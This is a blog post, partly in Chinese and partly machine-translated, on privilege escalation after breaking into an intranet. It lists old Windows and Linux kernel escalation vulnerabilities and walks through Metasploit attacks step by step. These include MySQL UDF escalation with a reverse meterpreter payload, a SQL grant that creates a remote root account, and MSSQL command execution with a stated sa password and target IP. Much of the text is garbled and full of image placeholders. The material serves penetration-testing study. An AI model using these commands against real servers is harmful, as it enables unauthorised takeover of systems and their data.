Regarding the issue of escalation of intranet penetration

	最近有小老弟问我,总有面试官问关于提权的问题,总是能把我难住。好吧,面试造航母干活 拧螺丝这句话在哪里都很实用,索性今天也就写一下我认为的提权。
	首先呢,其实权限提升这种事情多用于内网渗透,这里指的内网渗透当然不是你处于内网环境的渗透测试,而是那种在攻防演练、护网、打击境外的一些特殊场景,由外网入侵到内网做后渗透的时候遇到的权限提升问题。(大佬勿喷,我实在想不到还有哪里做提权,正常安全评估是完全用不到这一项技能的,毕竟传统工艺点到为止)

What is escalation

It is mainly aimed at increasing the current authority by exploiting the loopholes in the website or server system during the infiltration of the website, so that we can have the highest authority of the server.

Two ways to escalate rights

System vulnerability escalation

MS08-025 (KB951537)
MS09-012 (KB952004)
MS10-048 (KB2160329)
Linux Kernel <= 2.6.37 Local Privilege Escalation

System privilege escalation ms09-12 case (Pr.exe (KB952004))
Windows tracking registry ACL permissions Escalation Vulnerability

Insert picture description here

MS09-012: Churrasco (KB956572) Barbecue
Windows Tracking Registry ACL Privilege Escalation Vulnerability

Insert picture description here

MS08-025 (KB951537)
Windows Kernel-level

Insert picture description here

Privilege Escalation Vulnerability Linux Kernel <= 2.6.37 There

Insert picture description here

are so many cases of Local Privilege Escalation , here we use windows server Take the right escalation as an example. Since there are so many horses, how should it be used in real scenarios?

Insert picture description here

The WIN+R
systeminfo command can get system information, including which patches

Insert picture description here

have been applied to open the online website, and identify which privilege escalation vulnerabilities are available for use.
http://blog.neargle.com/win-powerup-exp-index/
will get you Copy the patch information to the website, you can get the detailed information about the use of the right-elevating horse.

Insert picture description here

There is also a guy who asked me, this is too much trouble, is there a way to output the systeminfo information to a file, and then use an automated tool for local identification
Here I just talk about how to print the output of the command to the txt directory, it's actually very simple

systeminfo > 目录/文件名

Example: There

Insert picture description here
Insert picture description here
Insert picture description here

is nothing to say about system privilege escalation. It's another matter for the manual boss. The defects of using this kind of thing are also obvious, because this kind of privilege escalation Trojan horse is inevitable. If there is a firewall and anti-software on the opposite side, it is sorrowful and concealed. It’s just for learning, don’t die, don’t take me when you die

Third-party software right escalation

Serv-U
VNC
SQL Server
……
What does third-party software mean, that is, some tool installations will automatically create an account with administrator privileges. We can use this mechanism to perform a privilege escalation

Serv-U (Port 43958)

Insert picture description here

VNC privilege escalation

Insert picture description here

SQL Server SA

Insert picture description here

PcAnyWhere

Insert picture description here

However, it is obvious that some things are no longer suitable for the current environment, and the technology has been updated. So here are examples I have encountered, which are well-known mysql-udf privilege escalation, mssql privilege escalation

MySql-UDF right escalation

Principle:
The exploit/multi/mysql/mysql_udf_payload module in MSF can also be used for UDF privilege escalation. MSF will write the dll file into the lib\plugin\ directory (the premise is that the directory exists, if the directory does not exist, the execution cannot be successful), the dll file name is an arbitrary created name. The dll file contains two functions sys_exec() and sys_eval(), but only the sys_exec() function is created by default, and there will be no echo when the function is executed. We can manually create the sys_eval() function to execute commands with echo.

Prerequisites:
1. The user has the permission to log in remotely
2. Know the user name and password

What if the user does not have the remote login permission, of course, is to find a way to log in to his database and create one manually

  1. Log in and test the target machine to create a remote access user
    Enter the sql statement grant all privileges on . To'root'@'%' identified by '123456' with grant option; Create a remote connection user, as shown in Figure 1
grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;
Insert picture description here

2. Use kili, msfconsloe, enter search mysql_udf_payload as shown in Figure 2

Insert picture description here

3. use exploit/multi/mysql/mysql_udf_payload, use, as shown in Figure 3

Insert picture description here

4. show payload, view available payloads, as shown in Figure 4

Insert picture description here

5. Set payload, set payload windows/ meterpreter/reverse_http, as shown in Figure 5

Insert picture description here

6. Set the database user name, password, ip address and listening port set rhosts; set username; set password; set lport, as shown in Figure 6

Insert picture description here

7. Exploit

Insert picture description here

small experiment verification
Use Navicat graphical tool to log in to the account Execute the command
select sys_exec('whoami'); //Execute the system command, msf creates sys_exec by default without echo, and returns 0 for success

Insert picture description here

create function sys_eval returns string soname'wsODEVzX.dll'; //Manually create an echoed function, The following .dll files are randomly generated and can be seen directly in Kili
select sys_eval('whoami'); execute once, as shown in Figure 9

Insert picture description here

Mssql privilege escalation

Known sa (default) user, the password is rising00.00!123, to perform mssql privilege
escalation Use msfconsole, enter the following command

search mssql
use uxiliary/admin/mssql/mssql_exec 
set rhosts 10.10.59.247
set password rising00.00!123
set cmd whoami
Show  options
exploit
Insert picture description here


Insert picture description here

There are not many scenarios for me to escalate rights. In general, system rights escalation are used. In fact, the conditions for escalating rights of third-party components of the database are very harsh.